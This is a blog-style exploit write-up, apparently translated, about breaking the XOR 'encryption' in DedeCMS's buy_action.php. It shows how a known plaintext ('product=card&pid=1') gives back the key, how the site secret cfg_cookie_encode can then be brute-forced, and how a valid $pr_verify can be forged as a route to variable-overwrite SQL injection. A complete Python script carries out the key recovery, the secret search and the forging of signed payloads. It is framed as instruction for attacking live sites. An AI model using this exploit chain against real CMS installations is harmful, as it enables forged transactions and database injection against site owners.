The beauty of XOR encryption # a popular weak web algorithm
The original author of this article is @my5t3ry, not me.
Some of the images are even borrowed directly. I am not plagiarizing --
I'm just riding on the big guy's coattails.
Studying symmetric algorithms gave me a thing for XOR encryption.
I AM BACK ~
A bit of popular science to help beginners understand the algorithm. XOR encryption is a very popular "encryption" scheme in web applications: the user data is combined with an encryption key by the algorithm, the resulting string passes through the application's security filtering untouched, and is later decoded and used to carry out the SQL operation.
However, this scheme is extremely insecure because of a basic property of XOR:
A ^ K = E    E ^ A = K
Given A and E (the strings before and after encryption), we get K. Once we know the key, we can build the encrypted string locally (evilcode) for the attack!
Today we are studying DedeCMS (buy_action.php).
Its mchStrCode is a simple XOR algorithm.
0x01 First glimpse of your beauty: algorithm analysis
The loop computes
string[0] ^ key[0]
then
string[1] ^ key[1]
and so on, appending each result byte to the end of $code. There are two cases.
Case one
$key length (18) <= $string length
When $k = $i = 17 the last byte of $key has been used, and the next iteration becomes:
$i = 18, $k = 0
That is, the byte-by-byte pairing looks like this (key "iamakey", string "iamastring"):
key    | i a m a k e y i a m
string | i a m a s t r i n g
The key is repeated as many times as needed until the whole string is encrypted!
Case two
$key length (18) > $string length
So when
$k = $i = strlen($string) - 1
$string is exhausted and the next iteration exits the loop. In other words, the key never fully enters $code.
As follows:
key    | i a m a k (e y)
string | i a m a s
The bracketed part of the key never reaches $code.
Now that we have analysed the algorithm, let's think about how to get at the key.
0x02 Can't resist your beauty: attacking the algorithm
Now we need to obtain the complete key.
Choose case one.
The idea is to construct a string with
strlen($string) >= 18
submit that string to the affected site and get back $code, then locally compute
$string ^ $code
to obtain $key (the MD5-derived key). From it we can build a forged $pr_verify that passes the verification:
$pr_verify = md5("payment".$pr_encode.$cfg_cookie_encode);
and then perform a GLOBALS[cfg_dbprefix] overwrite injection through variable override.
The relevant code is shown below.
Let's first look at how $string ($pr_encode in the code) is obtained:

    $pr_encode = '';
    foreach($_REQUEST as $key => $val)
    {
        $pr_encode .= $pr_encode ? "&$key=$val" : "$key=$val";
    }
    $pr_encode = str_replace('=', '', mchStrCode($pr_encode));
    $pr_verify = md5("payment".$pr_encode.$cfg_cookie_encode);
    $tpl = new DedeTemplate();
    $tpl->LoadTemplate(DEDEMEMBER.'/templets/buy_action_payment.htm');
    $tpl->Display();
Let's take control of it.
Here
$string = "product=card&pid=1" followed by the contents of $_COOKIE
because $_REQUEST collects parameters from $_GET, then $_POST, then $_COOKIE, in that order.
So the encrypted $code (that is, $pr_encode) contains all of the POST data and the cookies.
That means
strlen($string) >= strlen($key)
so we only need the first 18 bytes of the POST data, which conveniently are exactly "product=card&pid=1", for cracking; the rest can be ignored, since from there on the key simply repeats as in case one.
This gives us the key in MD5 form, but only 18 characters of it. The key is cut from offset 8 of the MD5 hex digest, so dropping the last two characters leaves the conventional 16-character MD5 that cracking tools accept; strip them and start brute-forcing.
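As an added example (not code from the original post or from DedeCMS), the following Python re-implements the XOR scheme analysed in 0x01 and walks through the attack in 0x02: known-plaintext recovery of the 18-byte key, an offline search for cfg_cookie_encode using those key bytes, and forging $pr_verify for attacker-chosen data. It assumes the key derivation is substr(md5($_SERVER['HTTP_USER_AGENT'].$cfg_cookie_encode), 8, 18), which is how I recall DedeCMS's mchStrCode (check it against your copy). The user agent, the cfg_cookie_encode value, the candidate list and the request data are all constructed for the example.

```python
import base64
import hashlib
from itertools import cycle

# Constructed stand-ins for the target's secrets (not real DedeCMS values).
USER_AGENT = "Mozilla/5.0 (constructed UA)"
CFG_COOKIE_ENCODE = "Ab3dEf"
KEY_LEN = 18


def derive_key(user_agent: str, cookie_encode: str) -> bytes:
    """Assumed derivation: substr(md5(UA . cfg_cookie_encode), 8, 18).
    Only 18 of the 32 hex digits ever act as key material."""
    digest = hashlib.md5((user_agent + cookie_encode).encode()).hexdigest()
    return digest[8:8 + KEY_LEN].encode()


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """$code .= $string[$i] ^ $key[$i % $len]: the key cycles when the string
    is longer (case one) and is only partly consumed when shorter (case two)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def b64_nopad(raw: bytes) -> str:
    # buy_action.php does str_replace('=', '', ...) on the encoded value
    return base64.b64encode(raw).decode().rstrip("=")


def b64_decode_nopad(text: str) -> bytes:
    # PHP's base64_decode tolerates missing padding; Python needs it restored
    return base64.b64decode(text + "=" * (-len(text) % 4))


def mch_str_code(string, key: bytes, action: str = "ENCODE"):
    """Mirror of mchStrCode: ENCODE -> base64(string ^ key), DECODE -> base64decode(string) ^ key."""
    if action == "ENCODE":
        return b64_nopad(xor_bytes(string, key))
    return xor_bytes(b64_decode_nopad(string), key)


def key_bytes_used(string_len: int, key_len: int = KEY_LEN) -> int:
    """Distinct key bytes that reach $code: all 18 in case one, only strlen($string) in case two."""
    return min(string_len, key_len)


def recover_key(known_plaintext: bytes, pr_encode: str, key_len: int = KEY_LEN) -> bytes:
    """Known-plaintext attack (E ^ A = K). With >= key_len known bytes the whole
    key comes back; with fewer (case two) only that prefix of it does."""
    ciphertext = b64_decode_nopad(pr_encode)
    n = min(len(known_plaintext), len(ciphertext), key_len)
    return xor_bytes(ciphertext[:n], known_plaintext[:n])


def crack_cookie_encode(recovered_key: bytes, user_agent: str, candidates):
    """Offline search: the recovered bytes are 18 hex digits of md5(UA . X),
    so each candidate X is checked by recomputing that substring."""
    for cand in candidates:
        if derive_key(user_agent, cand) == recovered_key:
            return cand
    return None


def pr_verify(pr_encode: str, cookie_encode: str) -> str:
    """$pr_verify = md5("payment".$pr_encode.$cfg_cookie_encode) from buy_action.php."""
    return hashlib.md5(("payment" + pr_encode + cookie_encode).encode()).hexdigest()


def forge(payload: bytes, user_agent: str, cookie_encode: str):
    """With cfg_cookie_encode known, any payload gets a valid $pr_encode/$pr_verify pair."""
    key = derive_key(user_agent, cookie_encode)
    enc = mch_str_code(payload, key, "ENCODE")
    return enc, pr_verify(enc, cookie_encode)


def demo():
    key = derive_key(USER_AGENT, CFG_COOKIE_ENCODE)
    # Constructed $_REQUEST as the server concatenates it: our POST fields first,
    # then whatever cookies follow. "product=card&pid=1" is exactly 18 bytes.
    request_data = b"product=card&pid=1&PHPSESSID=0123456789abcdef"
    pr_encode = mch_str_code(request_data, key)           # what the page hands back to us
    recovered = recover_key(b"product=card&pid=1", pr_encode)
    cracked = crack_cookie_encode(recovered, USER_AGENT, ["aaaa", "Ab3dEf", "Zz9"])
    evil_encode, evil_verify = forge(b"product=card&pid=2", USER_AGENT, cracked)
    return {"key": recovered, "cookie_encode": cracked,
            "pr_encode": evil_encode, "pr_verify": evil_verify}


if __name__ == "__main__":
    print(demo())
```

The candidate list stands in for whatever brute-force or dictionary search you run against the 16/18 recovered hex characters; the matching step is the same regardless of how the candidates are generated.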
Variable overwrite itself is not discussed in this article.
0x03 Pros and cons of the algorithm
A simple XOR algorithm is really nothing much: it is no more than a Vigenère cipher. It is included in this book only because of its prevalence in commercial software packages, at least those in the MS-DOS and Macintosh worlds [1502,1387]. Unfortunately, if a software security program proclaims that it has a "proprietary" encryption algorithm (significantly faster than DES) ... -- Applied Cryptography
It is true that XOR is lightweight and works on bitwise operations, which gives it a big speed advantage.
However, being lightweight and simple also means weak logic, so you should be extra careful when using it; for example, impose much stricter requirements on the complexity of $key.
Otherwise safe_code turns into evil_code.
0x04 Only a very good programmer can write a secure algorithm
So can XOR be both secure and simple? Let's look at the version in qibo cms.
It has two strengths:
1. The secret string is built from three parts, two of which are site-specific:
$webdb[mymd5].$rand.'5*j,.^&;?.%#@!'
The complexity is formidable.
2. An md5code taken from the input is folded into the key:
    $md5code = substr($string, -10);
    $key = md5($md5code.$secret_string);
which makes the key extremely complex.
Two rounds of MD5 with salt (and soy sauce): within any reasonable amount of time it basically cannot be cracked.
So XOR can be a strong algorithm, provided the key is kept secret. Of course, qibo has several vulnerabilities that let you read the key, which is why the evilcode approach still ends up with backend privileges.
0x05 References
Analysis of the latest universal DedeCMS injection vulnerability (buy_action.php)